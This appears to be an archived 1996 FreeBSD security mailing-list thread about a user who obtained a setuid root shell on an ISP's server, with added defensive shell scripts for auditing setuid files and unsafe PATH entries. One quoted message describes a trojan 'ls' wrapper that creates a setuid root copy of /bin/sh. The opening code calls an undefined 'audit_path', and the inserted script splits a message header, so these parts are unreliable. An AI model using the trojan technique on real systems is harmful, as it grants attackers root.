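# Prints regular files under each existing DIR that carry the setuid or
# setgid bit, without crossing into other filesystems. Run it over
# /usr/home, /tmp, /var/tmp and the like; a root-owned "-rwsr-xr-x"
# copy of a shell is exactly what it is meant to surface.
find_setuid() {
    for d in "$@"; do
        [ -d "$d" ] || continue
        find "$d" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print
    done
}

# make_sandbox
# Builds a constructed fixture (not a real system) in a temp directory:
# a clean "bin", a /tmp-like world-writable sticky "scratch" dir, and in
# it a setuid file named "sl" (mistyped ls) standing in for the decoy
# the thread describes. Prints the sandbox path.
make_sandbox() {
    box=$(mktemp -d) || return 1
    mkdir "$box/bin" "$box/scratch"
    chmod 755 "$box/bin"
    chmod 1777 "$box/scratch"
    printf '#!/bin/sh\necho "$0: not found."\nexit 1\n' > "$box/scratch/sl"
    chmod 4755 "$box/scratch/sl"
    printf '%s\n' "$box"
}

# Demonstration on the constructed sandbox.
SANDBOX=$(make_sandbox)
echo "== PATH audit =="
audit_path "$SANDBOX/bin:$SANDBOX/scratch:." || echo "(PATH needs fixing)"
echo "== setuid files under scratch =="
find_setuid "$SANDBOX/scratch"
rm -rf "$SANDBOX"
```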
From owner-freebsd-security Tue Jun 25 02:22:38 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id CAA07137 for security-outgoing; Tue, 25 Jun 1996 02:22:38 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id CAA07114; Tue, 25 Jun 1996 02:22:32 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id CAA20749; Tue, 25 Jun 1996 02:22:11 -0700 (PDT) Date: Tue, 25 Jun 1996 02:22:11 -0700 (PDT) 
From: -Vince- To: Don Yuniskis cc: dgy@rtd.com, mark@grumble.grondar.za, hackers@FreeBSD.ORG, security@FreeBSD.ORG, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606250903.CAA01576@seagull.rtd.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, Don Yuniskis wrote: > It seems that -Vince- said: > > > > On Tue, 25 Jun 1996, Don Yuniskis wrote: > > > > > It seems that -Vince- said: > > > > Hmmm, that's only if we had phone support.... We don't :) but do > > > > admins really go run a program that the user said won't run? > > > > > > Well, it *appears* that one of *you* did! :> > > > > Well, jbhunt was the one who gave the user the account and the > > user just transferred the root which is /bin/sh with setuid and ran it > > and he got root.... > > Um, someone can (and undoubtedly *will* :>) correct me if I'm wrong > but there's *NO WAY* to install a setuid binary *without* having root > in the first place! So, he could copy the program onto your > machine and the system would strip the "setuid" bit automatically. > Otherwise, there's no point in the setuid mechanism as anyone could make > a setuid binary on their own system and just upload it to yours! Yeah, that's what I'm trying to figure out... Vince From owner-freebsd-security Tue Jun 25 02:39:15 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id CAA07877 for security-outgoing; Tue, 25 Jun 1996 02:39:15 -0700 (PDT) Received: from solar.tlk.com (root@solar.tlk.com [194.97.84.34]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id CAA07871 for ; Tue, 25 Jun 1996 02:39:04 -0700 (PDT) Received: by solar.tlk.com id ; Tue, 25 Jun 96 11:38 MET DST Message-Id: 
From: torstenb@solar.tlk.com (Torsten Blum) Subject: Re: I need help on this one - please help me track this guy down! To: mwhite+@CMU.EDU (Matthew Jason White) Date: Tue, 25 Jun 1996 11:38:51 +0200 (MET DST) Cc: freebsd-security@freebsd.org In-Reply-To: <0lnmnpy00YUp8Ea2EM@andrew.cmu.edu> from Matthew Jason White at "Jun 24, 96 08:04:05 pm" Reply-To: torstenb@tlk.com X-Mailer: ELM [version 2.4ME+ PL15 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

Matthew Jason White wrote:
> You probably want to change the security script so that it points out
> ALL suid programs in /usr/home, /tmp, /var/tmp and /usr/tmp, or any
> other publicly writeable area. Are you running inn1.4 on this system?
> If so, you should probably upgrade to inn-1.4uoff4 (this port should
> prolly be upgraded, if someone hasn't already).

inn runs as user `news', so you can never create a setuid root shell even if inn has a bug...

-tb

From owner-freebsd-security Tue Jun 25 02:43:23 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id CAA08138 for security-outgoing; Tue, 25 Jun 1996 02:43:23 -0700 (PDT) Received: from solar.tlk.com (root@solar.tlk.com [194.97.84.34]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id CAA08118 for ; Tue, 25 Jun 1996 02:43:17 -0700 (PDT) Received: by solar.tlk.com id ; Tue, 25 Jun 96 11:43 MET DST Message-Id:
From: torstenb@solar.tlk.com (Torsten Blum) Subject: Re: I need help on this one - please help me track this guy down! To: gpalmer@freebsd.org (Gary Palmer) Date: Tue, 25 Jun 1996 11:40:15 +0200 (MET DST) In-Reply-To: <27780.835661925@palmer.demon.co.uk> from Gary Palmer at "Jun 25, 96 01:18:45 am" Reply-To: torstenb@tlk.com X-Mailer: ELM [version 2.4ME+ PL15 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

Gary Palmer wrote:
> [ CC: Trimmed ]
>
> > Yeah, that's the real question is like if he can transfer the
> > binary from another machine and have it work... other people can do the
> > same thing and gain access to FreeBSD boxes as root as long as they have
> > an account on that machine...
>
> Sort of. You need root access in the first place to create a suid root
> shell... It could be an old exploit that is now closed (like the
> mount_union loophole)...

Or the telnetd environment hole - it was possible to become root via telnet without an account on the target machine.

-tb

From owner-freebsd-security Tue Jun 25 03:05:52 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id DAA09455 for security-outgoing; Tue, 25 Jun 1996 03:05:52 -0700 (PDT) Received: from grumble.grondar.za (root@grumble.grondar.za [196.7.18.130]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id DAA09440; Tue, 25 Jun 1996 03:05:23 -0700 (PDT) Received: from grumble.grondar.za (mark@localhost.grondar.za [127.0.0.1]) by grumble.grondar.za (8.7.5/8.7.3) with ESMTP id MAA09345; Tue, 25 Jun 1996 12:02:23 +0200 (SAT) Message-Id: <199606251002.MAA09345@grumble.grondar.za> To: -Vince- cc: Don Yuniskis , mark@grumble.grondar.za, hackers@FreeBSD.ORG, security@FreeBSD.ORG, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net Subject: Re: I need help on this one - please help me track this guy down!
Date: Tue, 25 Jun 1996 12:02:23 +0200 From: Mark Murray Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

-Vince- wrote:
> On Tue, 25 Jun 1996, Don Yuniskis wrote:
> > > Hmmm, that's only if we had phone support.... We don't :) but do
> > > admins really go run a program that the user said won't run?
> >
> > Well, it *appears* that one of *you* did! :>
>
> Well, jbhunt was the one who gave the user the account and the
> user just transferred the root which is /bin/sh with setuid and ran it
> and he got root....

Review that. _Carefully_. I think you are seriously WRONG there. That user did something sneaky, and you did not see it.

M
--
Mark Murray 46 Harvey Rd, Claremont, Cape Town 7700, South Africa +27 21 61-3768 GMT+0200 Finger mark@grondar.za for PGP key

From owner-freebsd-security Tue Jun 25 03:24:08 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id DAA10609 for security-outgoing; Tue, 25 Jun 1996 03:24:08 -0700 (PDT) Received: from grumble.grondar.za (root@grumble.grondar.za [196.7.18.130]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id DAA10393 for ; Tue, 25 Jun 1996 03:23:22 -0700 (PDT) Received: from grumble.grondar.za (mark@localhost.grondar.za [127.0.0.1]) by grumble.grondar.za (8.7.5/8.7.3) with ESMTP id MAA09453; Tue, 25 Jun 1996 12:21:25 +0200 (SAT) Message-Id: <199606251021.MAA09453@grumble.grondar.za> To: -Vince- cc: Bradley Dunn , security@FreeBSD.org, jbhunt , Chad Shackley Subject: Re: I need help on this one - please help me track this guy Date: Tue, 25 Jun 1996 12:21:25 +0200
From: Mark Murray

-Vince- wrote:
> > *Sigh*. This is turning into elementary sysadmin class. If you are
> > going to admin a system with over 1000 users, you need to learn to
> > think security issues through. If "." is in the path, the cracker can
> > put a trojan horse in some directory where he *can* write, and he
> > will name it something he hopes the unsuspecting admin will execute
> > while root.
>
> Well, the problem here is one of the admins know the user and he
> was watching him just run the program himself, the root user had nothing
> to do with executing anything...

...in which case you were _really_ open. The user could do what he liked,
right? He didn't have to trick you, he just did it - with root privilege.
He just (ab)used your goodwill and naivete.

When you let users type commands on your system, you are supposed to be
alert :-)

M
--
Mark Murray  46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768  GMT+0200  Finger mark@grondar.za for PGP key

From owner-freebsd-security Tue Jun 25 03:43:06 1996
Date: Tue, 25 Jun 1996 12:01:29 +0200
From: Wolfram Schneider
Message-Id: <199606251001.MAA00691@campa.panke.de>
To: Matthew Jason White
Cc: security@FreeBSD.org, Chad Shackley , jbhunt
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <0lnmnpy00YUp8Ea2EM@andrew.cmu.edu>
References: <0lnmnpy00YUp8Ea2EM@andrew.cmu.edu>
Reply-to: Wolfram Schneider

Matthew Jason White writes:
>You probably want to change the security script so that it points out
>ALL suid programs in /usr/home, /tmp, /var/tmp and /usr/tmp, or any

If you have a separate partition for /usr/home, /tmp etc. use mount with
option nosuid.

Wolfram

From owner-freebsd-security Tue Jun 25 04:11:52 1996
From: Don Yuniskis
Message-Id: <199606251105.EAA10554@seagull.rtd.com>
Subject: Re: I need help on this one - please help me track this guy down!
To: mark@grumble.grondar.za.@grondar.za (Mark Murray)
Date: Tue, 25 Jun 1996 04:05:40 -0700 (MST)
Cc: vince@mercury.gaianet.net, dgy@rtd.com, mark@grumble.grondar.za, hackers@FreeBSD.ORG, security@FreeBSD.ORG, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net
In-Reply-To: <199606251002.MAA09345@grumble.grondar.za> from "Mark Murray" at Jun 25, 96 12:02:23 pm

> > > Well, it *appears* that one of *you* did! :>
> >
> > Well, jbhunt was the one who gave the user the account and the
> > user just transferred the root which is /bin/sh with setuid and ran it
> > and he got root....
>
> Review that. _Carefully_. I think you are seriously WRONG there. That
> user did something sneaky, and you did not see it.

I STRONGLY suggest "vince" repeat exactly what he's said here. When he
realizes it's "just not so", perhaps he'll rethink his NEXT post.

1) As root, create *any* suid file. Heck, use this guy's "root" file
   just in case you can't do it yourself.

2) As non-root, try to make a copy of that file... use cp, cat >, ftp it,
   up/download it via kermit, etc.

Let us know what you learn in the process!

From owner-freebsd-security Tue Jun 25 05:07:25 1996
From: Michael Smith
Message-Id: <199606251242.WAA00732@genesis.atrad.adelaide.edu.au>
Subject: Re: I need help on this one - please help me track this guy down!
To: vince@mercury.gaianet.net (-Vince-)
Date: Tue, 25 Jun 1996 22:12:28 +0930 (CST)
Cc: mark@grumble.grondar.za, hackers@FreeBSD.ORG, security@FreeBSD.ORG, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net
In-Reply-To: from "-Vince-" at Jun 25, 96 01:40:18 am

-Vince- stands accused of saying:
>
> Yeah, you have a point but jbhunt was watching the user as he
> hacked root since he brought the file from his own machine.... so that
> wasn't something the admin was tricked into doing..

... so jbhunt should know exactly what he did. If they don't, then
you should sack them presto.

But I don't think you understand; you cannot _make_ a file owned by
root unless you are _already_ root.

> Vince

--
]] Mike Smith, Software Engineer        msmith@atrad.adelaide.edu.au   [[
]] Genesis Software                     genesis@atrad.adelaide.edu.au  [[
]] High-speed data acquisition and      (GSM mobile) 0411-222-496      [[
]] realtime instrument control          (ph/fax) +61-8-267-3039        [[
]] Collector of old Unix hardware.      "Where are your PEZ?" The Tick [[

From owner-freebsd-security Tue Jun 25 06:24:23 1996
From: Joe Greco
Message-Id: <199606251323.IAA07541@brasil.moneng.mei.com>
Subject: Re: I need help on this one - please help me track this guy down!
To: davidg@root.com
Date: Tue, 25 Jun 1996 08:23:11 -0500 (CDT)
Cc: gpalmer@FreeBSD.ORG, vince@mercury.gaianet.net, mark@grumble.grondar.za, hackers@FreeBSD.ORG, security@FreeBSD.ORG, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net
In-Reply-To: <199606250714.AAA03862@root.com> from "David Greenman" at Jun 25, 96 00:14:37 am

> >No, everyone does NOT have `.' in their paths! I most certainly don't,
> >as I know that it's ALL too easy to have someone break your system
> >security that way. Imagine if you are looking into something as root,
> >and have `.' in your path. You go into someone else's directory, and do
> >a `ls'. All they need is a wrapper program called `ls' in that dir
> >which copies /bin/sh to some directory, chowns it to root, then sets
> >the setuid bit, and THEN exec's ls with the arguments given, and BANG,
> >there goes your system security.
>
> Actually, this particular problem can be avoided by putting "." last in
> the search path rather than first.

That's security via stupidity, it is about as much protection as a
windshield made out of plastic wrap. Most sites do not have commands
like "dir", "ren", etc. in /usr/bin or /usr/local/bin... (I do by the
way), making it easier for an unsuspecting admin to screw themselves in
this way.

My .cshrc, ancient but venerable...

[...]
set path=( /bin /usr/{bin,local/bin,ucb,games} /etc )
[...]
if ( -r ~/.path ) then
        if ( $root ) then
                set path=(`grep -v "\." < ~/.path`)
        else
                set path=(`cat ~/.path`)
        endif
endif
[...]

I for one am more comfortable having to prefix stuff with ./ if I really
want it to do what I mean.

...
Joe
-------------------------------------------------------------------------------
Joe Greco - Systems Administrator                           jgreco@ns.sol.net
Solaria Public Access UNIX - Milwaukee, WI                       414/546-7968

From owner-freebsd-security Tue Jun 25 07:41:12 1996
Date: Tue, 25 Jun 1996 07:40:34 -0700 (PDT)
From: "Eric J. Schwertfeger"
To: -Vince-
cc: Mark Murray , hackers@FreeBSD.ORG, security@FreeBSD.ORG, Chad Shackley , jbhunt
Subject: Re: I need help on this one - please help me track this guy down!

On Tue, 25 Jun 1996, -Vince- wrote:
> Yeah, you have a point but jbhunt was watching the user as he
> hacked root since he brought the file from his own machine.... so that
> wasn't something the admin was tricked into doing..

Then the important question is, how did he move the file so that it
retained the setuid bit? We're already pretty sure that the program is
only /bin/sh with the setuid bit turned on. So either he found a way to
move the file with the bit turned on, or he found a way to turn it on,
which requires root access.

From owner-freebsd-security Tue Jun 25 08:08:09 1996
From: Andrew.Gordon@net-tel.co.uk
Date: Tue, 25 Jun 96 15:02:08 +0000
Message-Id: <"811-960625150230-D047*/G=Andrew/S=Gordon/O=NET-TEL Computer Systems Ltd/PRMD=NET-TEL/ADMD=Gold 400/C=GB/"@MHS>
To: list:;
Cc: security@freebsd.org
In-Reply-To: <199606251242.WAA00732@genesis.atrad.adelaide.edu.au>
Subject: Re(2): I need help on this one - please help me track this guy down!

> -Vince- stands accused of saying:
> >
> > Yeah, you have a point but jbhunt was watching the user as he
> > hacked root since he brought the file from his own machine.... so that
> > wasn't something the admin was tricked into doing..

But what file transfer mechanism was used? NFS maybe? Certainly a simple
NFS mount of an untrusted machine is a dangerous thing to do, since
setuids on those files will be obeyed. Maybe you allow this via an
incautious AMD map?

Personally, I like to mount all NFS filesystems "nosuid" - and likewise
for all local systems exported by NFS (I don't normally export / or
/usr).
Most users have no business creating setuid programs in their filespace,
and such a policy would most likely have prevented this breach even if
the setuid binary was created by some other means.

From owner-freebsd-security Tue Jun 25 08:16:59 1996
From: hal@snitt.com (Hal Snyder)
To: security@freebsd.org
Subject: The Vinnie Loophole
Date: Tue, 25 Jun 1996 15:17:47 GMT
Organization: Siemens Nixdorf Transportation Technologies
Message-ID: <31cffc6e.1096226166@vogon.trans.sni-usa.com>

Re: Trojan horse programs that get executed because "." is in PATH
somewhere:

The fact that this well-known, easily plugged loophole is being
rediscovered by new admins (probably daily) suggests that we *could*
do something more proactive to keep it from happening.

1. How about adding checks for "." or equivalent in $PATH to
/etc/security? Scan for it in .profile, .bashrc, and so forth. This
would not catch every offence but would help.

2. At appropriate securelevel, have exec() fail with explanation to
syslog if there is no "/" in argv[0]. How much code would [should]
this break? Is this a horrible idea?

From owner-freebsd-security Tue Jun 25 08:38:45 1996
Message-Id: <199606251538.IAA19357@root.com>
To: hal@snitt.com (Hal Snyder)
cc: security@freebsd.org
Subject: Re: The Vinnie Loophole
In-reply-to: Your message of "Tue, 25 Jun 1996 15:17:47 GMT." <31cffc6e.1096226166@vogon.trans.sni-usa.com>
From: David Greenman
Reply-To: davidg@root.com
Date: Tue, 25 Jun 1996 08:38:29 -0700

>Re: Trojan horse programs that get executed because "." is in PATH
>somewhere:
>
>The fact that this well-known, easily plugged loophole is being
>rediscovered by new admins (probably daily) suggests that we *could*
>do something more proactive to keep it from happening.
>
>1. How about adding checks for "." or equivalent in $PATH to
>/etc/security? Scan for it in .profile, .bashrc, and so forth. This
>would not catch every offence but would help.
>
>2. At appropriate securelevel, have exec() fail with explanation to
>syslog if there is no "/" in argv[0]. How much code would [should]
>this break? Is this a horrible idea?

It's appropriate for some environments and not for others. I certainly
wouldn't want the kernel involved in this in any case, and things that
do scans through your filesystems need to be carefully controlled. Some
systems have so much disk space and NFS that the scan wouldn't complete
within the 24 hour time period. Something like (1), if implemented,
should not be enabled by default.

-DG

David Greenman
Core-team/Principal Architect, The FreeBSD Project

From owner-freebsd-security Tue Jun 25 08:44:16 1996
Date: Tue, 25 Jun 1996 08:43:37 -0700 (PDT)
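An added example of the kind of check proposal (1) describes, written here as a stand-alone POSIX sh script an admin runs by hand rather than something enabled by default; it is not code from any message in this thread nor from FreeBSD's own /etc/security. It goes a little beyond "." itself and also flags empty and relative PATH entries, which the shell treats the same way; the function names and the two rc-file syntaxes it understands are assumptions.

```shell
#!/bin/sh
# Added example, not code from any message in this thread and not FreeBSD's
# own /etc/security: a stand-alone audit of PATH settings in the spirit of
# proposal (1), meant to be run by hand rather than enabled by default.
# Assumptions: POSIX sh and awk; rc files use either the sh-family
# "PATH=..." / "export PATH=..." form or the csh-family "set path = ( ... )".

# unsafe_path_entries PATHSTRING
# Prints one line "<position>:<entry>" for each entry that makes the shell
# search a directory an attacker may control: ".", an empty entry (leading,
# trailing or doubled colon, which the shell also treats as the current
# directory) and any other relative entry. Unevaluated references such as
# $PATH or ~/bin cannot be judged here and are skipped.
# Returns 0 when every remaining entry is an absolute path, 1 otherwise.
unsafe_path_entries() {
    _rest="$1:"        # sentinel colon: the last entry is handled like the rest
    _pos=0
    _bad=0
    while [ -n "$_rest" ]; do
        _entry=${_rest%%:*}
        _rest=${_rest#*:}
        _pos=$((_pos + 1))
        case $_entry in
            "")       printf '%s\n' "$_pos:<empty> (current directory)"; _bad=1 ;;
            .)        printf '%s\n' "$_pos:."; _bad=1 ;;
            /*)       ;;                  # absolute path: fine
            \$*|\~*)  ;;                  # variable or ~ reference: not evaluated
            *)        printf '%s\n' "$_pos:$_entry (relative)"; _bad=1 ;;
        esac
    done
    return $_bad
}

# path_assignments_in_file FILE
# Prints the value of every PATH assignment found in FILE as one
# colon-separated string per line, ready for unsafe_path_entries.
path_assignments_in_file() {
    awk '
        # sh/ksh/bash style:  PATH=/bin:.   or   export PATH="/bin:."
        /^[ \t]*(export[ \t]+)?PATH=/ {
            v = $0
            sub(/^[ \t]*(export[ \t]+)?PATH=/, "", v)
            sub(/[ \t;#].*$/, "", v)      # drop "; export PATH", comments
            gsub("[\"\047]", "", v)       # strip quotes
            print v
        }
        # csh/tcsh style:  set path = ( /bin . )
        /^[ \t]*set[ \t]+path[ \t]*=[ \t]*\(/ {
            v = $0
            sub(/^[^(]*\(/, "", v)
            sub(/\).*$/, "", v)
            sub(/^[ \t]+/, "", v)
            sub(/[ \t]+$/, "", v)
            gsub(/[ \t]+/, ":", v)
            print v
        }
    ' "$1"
}

# audit_rc_file FILE
# Reports each unsafe PATH assignment in FILE; returns 1 if any was found.
audit_rc_file() {
    _status=0
    # A here-document (not a pipe) keeps the loop in the current shell so
    # _status survives it.
    while IFS= read -r _value; do
        [ -n "$_value" ] || continue
        if ! unsafe_path_entries "$_value" >/dev/null; then
            printf '%s: unsafe PATH assignment: %s\n' "$1" "$_value"
            _status=1
        fi
    done <<EOF
$(path_assignments_in_file "$1")
EOF
    return $_status
}
```

Run it over the rc files of every account that can become root (for example `for f in /root/.cshrc /root/.profile /home/*/.profile; do audit_rc_file "$f"; done`); it reports nothing for a clean file, so it can be dropped into a periodic job without the noise Jeff objects to below.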
From: jbhunt
To: Michael Smith
cc: -Vince- , mark@grumble.grondar.za, hackers@FreeBSD.ORG, security@FreeBSD.ORG, chad@mercury.gaianet.net
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <199606251242.WAA00732@genesis.atrad.adelaide.edu.au>

On Tue, 25 Jun 1996, Michael Smith wrote:
> -Vince- stands accused of saying:
> >
> > Yeah, you have a point but jbhunt was watching the user as he
> > hacked root since he brought the file from his own machine.... so that
> > wasn't something the admin was tricked into doing..
>
> ... so jbhunt should know exactly what he did. If they don't, then
> you should sack them presto.
>
> But I don't think you understand; you cannot _make_ a file owned by
> root unless you are _already_ root.
>
> > Vince
>
> --
> ]] Mike Smith, Software Engineer        msmith@atrad.adelaide.edu.au   [[
> ]] Genesis Software                     genesis@atrad.adelaide.edu.au  [[
> ]] High-speed data acquisition and      (GSM mobile) 0411-222-496      [[
> ]] realtime instrument control          (ph/fax) +61-8-267-3039        [[
> ]] Collector of old Unix hardware.      "Where are your PEZ?" The Tick [[

Ok, this is jb. First of all, this copied from here to there as root
didn't happen. I gave this fella an account knowing more than likely if
we had a hole he would find it. Unfortunately I wasn't watching his tty
when he actually used whatever exploit he used. He obviously used a
setuid exploit so I suggest that there is a New exploit out abusing a
setuid program somewhere on the system because I know vince fixed the
mount_union and current fixed the old ypwhich hack. Or actually maybe not
so old for some of you, but either way I did have to give him an account
before he could do anything. However, once inside it took him 2 minutes
and he was root.
I know for a fact it was his FIRST look inside the system and I ran no
scripts from his dir. That option is out so don't bother. I did start
watching his tty after he took root but it was too late. I am open to
any suggestions any of you have; so far this seems to be a very
constructive group :>

John
SysAdmin Gaianet

From owner-freebsd-security Tue Jun 25 08:57:27 1996
Date: Tue, 25 Jun 1996 18:56:44 +0300 (EET DST)
From: Narvi
To: "Eric J. Schwertfeger"
cc: -Vince- , Mark Murray , hackers@FreeBSD.org, security@FreeBSD.org, Chad Shackley , jbhunt
Subject: Re: I need help on this one - please help me track this guy down!

On Tue, 25 Jun 1996, Eric J. Schwertfeger wrote:
> On Tue, 25 Jun 1996, -Vince- wrote:
>
> > Yeah, you have a point but jbhunt was watching the user as he
> > hacked root since he brought the file from his own machine.... so that
> > wasn't something the admin was tricked into doing..
>
> Then the important question is, how did he move the file so that it
> retained the setuid bit? We're already pretty sure that the program is
> only /bin/sh with the setuid bit turned on. So either he found a way to
> move the file with the bit turned on, or he found a way to turn it on,
> which requires root access.

How did he get the file there in the first place? Via ftp? Or did he
just copy it over? Ftp seems to remove even the exec bit, let alone the
setuid. Could there be a way of attack via a modified ftp server?
Sander

From owner-freebsd-security Tue Jun 25 09:16:36 1996
Message-Id: <199606251613.SAA10099@grumble.grondar.za>
To: jbhunt
cc: Michael Smith , -Vince- , mark@grondar.za, security@FreeBSD.ORG, chad@mercury.gaianet.net
Subject: Re: I need help on this one - please help me track this guy down!
Date: Tue, 25 Jun 1996 18:13:06 +0200
From: Mark Murray

[hackers removed from cc: - the crosspost is getting a bit much there]

jbhunt wrote:
> Ok, this is jb. First of all, this copied from here to there as root
> didn't happen. I gave this fella an account knowing more than likely if
> we had a hole he would find it. Unfortunately I wasn't watching his tty
> when he actually used whatever exploit he used.

Ok...

> He obviously used a
> setuid exploit so I suggest that there is a New exploit out abusing a
> setuid program somewhere on the system because I know vince fixed the
> mount_union and current fixed the old ypwhich hack.

Not so fast. You didn't see what he did, but you are claiming suid.
Maybe, maybe not. You don't _know_.

> Or actually maybe not
> so old for some of you, but either way I did have to give him an account
> before he could do anything. However, once inside it took him 2 minutes
> and he was root. I know for a fact it was his FIRST look inside the
> system and I ran no scripts from his dir.

How do you know? If "." is in your path, you run a script from wherever
you are - /tmp, /var/tmp, /var/mail if you have made that world writable
etc. What other world writable directories do you have? What runs out of
cron? What is automatically executed when you run emacs? vi? What is
your EDITOR setting for vipw? Do you read your daily security report?
Create a new suid file and see if it is reported the next day.

> That option is out so don't
> bother. I did start watching his tty after he took root but it was too
> late. I am open to any suggestions any of you have so far this seems to
> be a very constructive group :>

The most constructive suggestion at the moment is to look for your own
mistakes, and be more open to them. So far it seems you (collectively)
have made lots, but aren't admitting this - even to yourselves.

Ask him what he did - maybe he'll even tell you?
:-)

If it is a FreeBSD security hole, we'll all thank him and you for
finding it :-).

M
--
Mark Murray  46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768  GMT+0200  Finger mark@grondar.za for PGP key

From owner-freebsd-security Tue Jun 25 09:26:46 1996
From: Jeff Aitken
Message-Id: <199606251626.MAA06583@husky.cslab.vt.edu>
Subject: Re: Re(2): I need help on this one - please help me track this guy down!
To: Andrew.Gordon@net-tel.co.uk
Date: Tue, 25 Jun 1996 12:26:17 -0400 (EDT)
Cc: security@freebsd.org
In-Reply-To: <"811-960625150230-D047*/G=Andrew/S=Gordon/O=NET-TEL Computer from "Andrew.Gordon@net-tel.co.uk" at Jun 25, 96 03:02:08 pm

> But what file transfer mechanism was used? NFS maybe?
>
> Personally, I like to mount all NFS filesystems "nosuid" - and likewise
> for all local systems exported by NFS (I don't normally export / or
> /usr). Most users have no business creating setuid programs in their
> filespace, and such a policy would most likely have prevented this
> breach even if the setuid binary was created by some other means.

One thing you can do to help with this sort of problem is to map UID 0
to some other UID. In our lab, we've got an AlphaStation which exports
several filesystems via NFS. On a few administrative-type machines, we
map UID 0 to UID 0 (so that root on any of the administrative machines
can alter files as needed) but on the client machines (i.e., those
machines used primarily by lab patrons) UID 0 is mapped to 'nobody' or
somesuch. Furthermore, only system administrators have accounts on the
servers; thus, even if someone breaks root on a client machine in the
lab, they can't install any sort of backdoor on the server. If/when
such a compromise is detected, we simply reinstall the OS on the client
machine. I've got my FreeBSD installs down to an hour or so by now :-)

Under Digital Unix, the syntax in /etc/exports goes something like this:

    /exported/filesystem -root=admin.machine.1 -root=admin.machine.2 client.machine.1 client.machine.2

and so on.
I haven't set up this sort of thing under FreeBSD, but I believe the
-maproot option provides equivalent functionality. See exports(5) for
more information.

None of this addresses the potential problem of address/hostname
spoofing (i.e., if someone can convince the NFS server that they are one
of the administrative machines, you're in trouble), but it's better than
nothing.

--
Jeff Aitken
jaitken@cs.vt.edu

From owner-freebsd-security Tue Jun 25 09:42:51 1996
From: Jeff Aitken
Message-Id: <199606251642.MAA06642@husky.cslab.vt.edu>
Subject: Re: The Vinnie Loophole
To: hal@snitt.com (Hal Snyder)
Date: Tue, 25 Jun 1996 12:42:33 -0400 (EDT)
Cc: security@freebsd.org
In-Reply-To: <31cffc6e.1096226166@vogon.trans.sni-usa.com> from "Hal Snyder" at Jun 25, 96 03:17:47 pm

> 1. How about adding checks for "." or equivalent in $PATH to
> /etc/security? Scan for it in .profile, .bashrc, and so forth. This
> would not catch every offense but would help.

I can't speak for anyone else, but that would be the first sort of
"security check" I would disable (along with the damn message about not
logging in as root, but to use 'su'). Useless messages like

    WARNING: root has "." in their path!!!

filling my system logs is *not* what I consider helpful. If you put "."
last in the path you should be fine. If you've got "Unix System
Administrators" who are trying to use commands like DIR and REN, or are
wondering why there isn't a C:\UNIX directory, well, I think you're in
trouble anyway :-)

--
Jeff Aitken
jaitken@cs.vt.edu

From owner-freebsd-security Tue Jun 25 09:48:25 1996
Date: Tue, 25 Jun 1996 09:53:11 -0700 (PDT)
Message-Id: <199606251653.JAA09261@mugwump.paccar.com>
To: security@FreeBSD.org
From: Arlen Fletcher
Subject: Re: I need help on this one - please help me track this guy down!

At 08:43 AM 6/25/96 -0700, you wrote:
>On Tue, 25 Jun 1996, Michael Smith wrote:
> [snip]
>Ok, this is jb. First of all, this copied from here to there as root
>didn't happen. I gave this fella an account knowing more than likely if
>we had a hole he would find it. Unfortunately I wasn't watching his tty
>when he actually used whatever exploit he used. He obviously used a
>setuid exploit so I suggest that there is a New exploit out abusing a
>setuid program somewhere on the system because I know vince fixed the
>mount_union and current fixed the old ypwhich hack. Or actually maybe not
>so old for some of you, but either way I did have to give him an account
>before he could do anything. However, once inside it took him 2 minutes
>and he was root. I know for a fact it was his FIRST look inside the

Did you by any chance check the history file? I presume he vaporized it,
but you never know....

Of course it's 20/20 hindsight, but copying the history file somewhere
else when you see a user doing something bizarre (like becoming root)
might be worth thinking about in the future.

-----------------------------------------------------------------
Opinions expressed in this message are mine and not necessarily
those of my employer.
-----------------------------------------------------------------
Arlen Fletcher  N7YIM
fletcher@paccar.com

From owner-freebsd-security Tue Jun 25 10:01:16 1996
From: Andrew.Gordon@net-tel.co.uk
Received: (from root@localhost) by eldorado.net-tel.co.uk (8.6.12/8.6.10) id RAA13900; Tue, 25 Jun 1996 17:58:30 +0100
Received: from "/PRMD=NET-TEL/ADMD=GOLD 400/C=GB/" by net-tel.co.uk (Route400-RFCGate); Tue, 25 Jun 96 17:53:37 +0100
X400-Received: by mta "eldorado" in "/PRMD=net-tel/ADMD=gold 400/C=gb/"; Relayed; Tue, 25 Jun 96 17:53:37 +0100
